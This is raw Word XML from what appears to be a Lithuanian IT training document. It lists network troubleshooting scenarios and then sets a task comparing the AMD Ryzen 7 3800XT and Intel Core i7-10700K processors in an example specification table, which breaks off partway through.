    <w:p w14:paraId="267E9FE2" w14:textId="59B1D121" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="00AD1C55" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1) Niekas neveikia;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE75FAE" w14:textId="0D39E1BE" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="7F45095B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2) Direktorius neturi prieigos prie</w:t>
      </w:r>
      <w:r w:rsidR="04B60AAD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidR="46CAF9C3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Direktoriaus </w:t>
      </w:r>
      <w:r w:rsidR="04B60AAD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pavaduotojo"</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AD6AB" w14:textId="7501E2CA" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="7F45095B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3) Iš filialo nėra prieigos prie ftp serverio</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348F77D" w14:textId="61EACCC7" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="7F45095B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4) Portalas neveikia</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D860F2" w14:textId="7A2AD248" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="7F45095B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5) Įmonė</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s svetainė neveikia;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C518D" w14:textId="33EC6CB9" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="7F45095B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6) Nėra prieigos prie filialo komutatoriaus</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3D479" w14:textId="0920C9D8" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="7F45095B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7) User1 nesiunčia paketų iki</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>numatytojo šliuzo (default gateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D1095" w14:textId="6901756C" w:rsidR="00AD1C55" w:rsidRPr="005A5C28" w:rsidRDefault="00AD1C55" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D765DC" w14:textId="77777777" w:rsidR="00E643C6" w:rsidRPr="005A5C28" w:rsidRDefault="00E643C6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI STACIONARIŲ KOMPIUTERIŲ PROCESORIŲ ARCHITEKTŪRĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4FDE3" w14:textId="1B25B01B" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="0865F9BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433EDBDD" w14:textId="098148FC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="0865F9BA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>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225"/>
        <w:gridCol w:w="3330"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3ED6A18A" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2155A31D" w14:textId="035B3B05" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="0066332E" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3A1DE48C" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD RYZEN 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D48A4BA" w14:textId="22C35197" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3800XT</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="38FFEC02" w14:textId="3DB04FCA" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>INTEL Core i7-10700K</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="01B6857E" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5FCFE383" w14:textId="6DD044DA" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Technologija</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="76E85D08" w14:textId="4BACA9B2"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TSMC 7nm FinFET </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02A833ED" w14:textId="2E6DAB4E"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Intel 14+++ nm </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7122329C" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2B867E94" w14:textId="74289357" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Architektūra</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2977BCE0" w14:textId="7CAEFC13"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Zen2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18AE599E" w14:textId="2F8362A1"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Comet Lake </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="53DF7246" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4D136C9D" w14:textId="5E352D41" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lizdas (Socket)</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2CD01537" w14:textId="6C5DE50D"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AM4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F762E82" w14:textId="5BC0AFAD"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FCLGA1200 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="438B07C3" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="57358C1A" w14:textId="28692969" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Branduolių/gijų sk.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2651134B" w14:textId="37334428"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8/16 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6734335E" w14:textId="70F08F62"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8/16 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2674396C" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="12F04B02" w14:textId="244B7E8A" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Taktinis dažnis (Turbo Boost)GHz</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50035DA5" w14:textId="2A257A72"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3.9GHz/ 4.5GHz </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6FE5FA69" w14:textId="687BA712"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3.80 GHz /5.10 GHz </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="19A3AFF9" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4308105B" w14:textId="2BADD28A" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties cache [L3] talpa</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72457C91" w14:textId="2A7AD201"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32MB </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5FA30704" w14:textId="7927ED18"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16 MB Intel® Smart Cache </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6F3125A1" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="100CEAD3" w14:textId="3AAC74A2" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Valdiklis PCI Express 3.0</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B2F8060" w14:textId="6F9B5CA2"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PCIe 4.0 x16 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CC64D8C" w14:textId="36046AE6"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PCIe 3.0 x16 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="692F183F" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3CBD399F" w14:textId="6A3E02A9" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties valdiklis</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="115A920F" w14:textId="39E01F82"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Integruotas procesoriuje / DDR4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5802A3ED" w14:textId="646C328C"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Integruotas procesoriuje / DDR4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4A487A99" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1E9D568B" w14:textId="544169A8" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
